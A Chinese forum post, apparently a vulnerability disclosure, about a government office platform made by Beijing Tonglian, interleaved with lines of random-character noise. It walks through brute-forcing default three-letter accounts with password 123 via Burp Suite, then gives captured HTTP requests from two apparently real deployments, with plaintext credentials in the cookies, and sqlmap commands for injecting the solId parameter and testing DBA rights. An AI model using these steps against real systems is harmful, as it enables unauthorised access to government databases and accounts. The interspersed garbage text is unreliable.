|
: p* _: {3 x/ S) a1 W
# F5 X6 K8 h2 [: g W3 X
2 b5 K$ e0 @: m, ]. P, G/ \+ l% y3 q1 H! o: z. e% k
平台简介:1 g* G, s3 u, ?1 d* K0 c$ S' Q
* Z: \. c ~" a( z: i
/ C- S9 W$ a6 M4 e8 D . W3 b& S! _) F' @7 ]* x
( q0 u s. W9 B6 M# |
/ }5 l' y% z+ @0 w- h 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
1 |3 T6 F/ T2 q" J _+ |$ v9 l同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
! @4 U8 G* F1 z0 A/ s同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献! u( b+ @' |# h
2 P/ U; U4 c8 J: o/ w& c. J1 o$ }
9 I! H0 i+ w4 k; ~8 p! z
! O- _$ J+ I3 P9 o! R 4 Q+ @$ ]* c; L0 t v
# Q* ~& V, A% Q$ Y
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:+ \" m" k5 a7 S# e7 }5 |$ `, n/ K
8 w5 e; f( w0 G7 N6 q" J) k
+ U5 g8 f5 _% c ( [- s8 ^9 |/ _* W
7 M4 v9 L8 T0 U9 S9 }6 J7 v( z( n
3 Z8 u/ R3 T2 L7 k* W
http://1.1.1.1:7197/cap-aco/#(案例2-)4 l0 |( `& p( ]2 Z1 F* T
' G. q+ U3 ? ^: o6 K) o( V$ [/ W8 Y s3 T3 q+ s
http://www.XXOO.com (案例1-官网网站)' R7 \; a# }1 o5 d: s6 D; l0 Q
$ K5 U0 z0 d+ N+ f; n* Q2 }
6 I2 q9 ^+ l; X! i: |
( V" S. r, G, w4 k5 U9 @! ^
$ _, `6 v. q; [, ?, J: h1 H- F2 M g1 h. B A0 u
漏洞详情:
1 j6 L4 B1 K' z, i# p) T4 w
5 T- b: F- y! x8 x! X' e/ Q2 A7 R. B/ r# \" N4 m% C: z7 |
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
0 h$ _( r0 ^" B+ {( B0 d
& B" w% r5 ]; q9 E- w% U
' r c9 {4 L) h; D' f4 e2 e0 c( R 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:% I8 H% s K" n( {
Z1 D f3 F3 f0 `0 f+ |2 P o+ S$ ]- N, L9 [
8 \) D2 J9 d7 X' j4 F) U
1 x" Q9 g: x% h3 ~6 D: o
9 W3 O& w. c. @% m$ ^2 @& Y: u
; _9 K, A$ D1 c3 o: f 6 M0 W. S+ `# T$ q6 q
9 n, H, K0 ^: F
status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:8 W8 o4 }9 z$ c) e1 k4 k
L# i+ W+ Z, J, s3 m8 J5 A7 O3 d5 C. W7 Y- R
1、案例1-官方网站* b. h+ m) Q5 `- e1 y+ `5 O
+ x M* v4 u: g8 T- p. k& K
$ D/ {7 ?5 a/ U8 p
GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.19 K% @$ t2 O2 Z+ N
1 J4 B! K* N* _- W2 |! a1 h, ^; e' g
, ?. s4 ?: L% q4 r
Host: www.XXOO.com z5 S9 i& j, Y, m2 E/ S- P
5 Z( H8 f S/ z/ Y, m8 U. ~# I
0 N% @- D, `7 w8 a% U, v6 J! N
Proxy-Connection: Keep-Alive( X% m8 J) D( ~
) L1 Y' f% X) x3 P3 y! X
7 }8 }7 y2 e7 p+ J+ L4 L7 g
Accept: application/json, text/javascript, */*; q=0.01+ v' n. a0 Y$ E7 s _( V* F* p1 L
: r1 L: B- j" ?/ `! F- L+ w: |2 i
% k e/ O# z( y" f1 R Accept-Language: zh-CN( w" B, W" A( J: K$ U7 @
; @ O+ _) U/ G1 T
- D4 ] k! \( ~, w: Y5 E$ w5 Y
Content-Type: application/json
& \9 t. r S$ b. Q" ]6 f
1 {1 A8 j( ^9 n4 _! u9 K6 Q3 E, H; J$ e' a& I
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko/ E; Q. b& }) ]: E
! J; v8 [/ u' \9 Q. _9 u2 L
+ D* d C9 G$ Y* L X-Requested-With: XMLHttpRequest
& d% p J9 R, z" t! l/ B! _ `& M; {2 J 8 g x# o* S: ^* e
& l: ^7 H9 S( [: _+ l @3 q N8 \ Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002
6 t$ }+ Q# R5 }' v7 i% n
9 u3 Z; P$ g2 }* u6 ~" P, O+ s2 z: H/ v8 e% A
Accept-Encoding: gzip, deflate, sdch+ j1 ^- k9 e' Z. B" w( M5 ?$ z
, R; T; r' `5 z [3 G) e) n! j
) C5 a% H! ^ D% e; n8 x Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e
1 y8 I" v+ s* x% N+ G1 G2 D8 R% ^
?9 I3 [- k) R+ O$ k! L
, L& f9 [" w0 A) y 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:& R4 X; y& l, a0 E+ C0 [* q! B
/ q; k5 ]( |0 A7 J
, f$ Y- T0 {6 z8 F: u  $ @& N- c- ]4 R2 d
X9 {+ x8 r; l8 o' R5 D5 f3 r
+ ]3 @# N; p$ m3 a , P1 _# [) L0 p
, l0 }* L4 d1 l7 |6 P
; l1 c. l2 l. }$ F% [
6 A0 S& R/ c4 d3 m; y3 v7 `8 R6 r, o( A
5 q1 m K& i8 W 7 [0 t- T1 D4 s& q
7 I+ T q/ r. R6 d: ]
1 _/ O9 X8 N1 D" J) k
! }. s+ p* A; ^! B
6 X3 H# n1 R/ a! z& [! \# c7 P' W
) O% G' n9 ?! Z1 T1 |! L 2、案例2-某天河云平台: L; p0 a5 W3 F; {% V1 G
( d# z# `; n' `. |
7 n6 _2 z3 m& `8 e7 a GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1
$ V1 W2 I. w" E- y- E & P; P a$ T8 @9 }9 S
( q6 f+ B' Z: N Host: 1.1.1.:7197
R _& _/ G/ b& \$ S
3 e* ^; Q* [. {' V1 m2 @( _+ G2 T( @
Accept: application/json, text/javascript, */*; q=0.01# z0 |7 W- f; x7 f5 i# r9 t
' N6 F% X* k2 `7 _- H C+ P" C8 x( T6 W( W' _3 p" l! J
X-Requested-With: XMLHttpRequest
) z2 j* O2 R9 m+ M! }& I
6 Q- h- a; M& Z+ W/ |- p1 b: B- Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0. @' \6 n8 v+ z5 K! T
$ r( {/ a) N; e; B# Q! m0 k$ L) {) ]( A. x- V {+ T; F- |- V6 @
Content-Type: application/json
& B0 T4 H" z4 H% r) ` 3 r' ?; ]# n4 L% Z6 R
% a# f) H% F2 z
Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=10081 @# b; x% Y1 f% k H+ ^3 p3 K
3 f, q) R; {) S! I, E1 ^& k- g4 A
% R2 R: K' ^% R2 E6 M/ Y
Accept-Language: zh-CN,zh;q=0.8
) d) g& d, o6 ^6 b
/ b7 j+ Y/ W2 g/ y" _- k4 w8 h- t$ F' t {8 e2 K
Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=13 h( k9 S4 K" q* T3 J
/ _% A( M$ g3 Y6 l+ U# G4 k
2 {; k+ P' X; y8 n; n" ?1 }$ P Connection: close
5 ^4 C: w, Q" u+ J" a0 J- d Y0 I5 ?9 U 8 D; D; e8 B' ^: B" ^% b) V" r
& M* d. k" T$ {8 K5 f
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:3 Y, ^, T3 N# s4 S& J. h
) E: x' V& p. J
]9 p( H0 \) e- E1 N9 B! n( u
 1 }0 A8 C. ^, I+ A7 K- T$ e
; E/ r/ C" f" }! |0 o1 ~: h5 X) h7 z j0 g
, f* J4 s/ H; X+ X7 h( e! w& e/ ?
| 
发表于 2018-10-20 20:15:17
收藏
支持
反对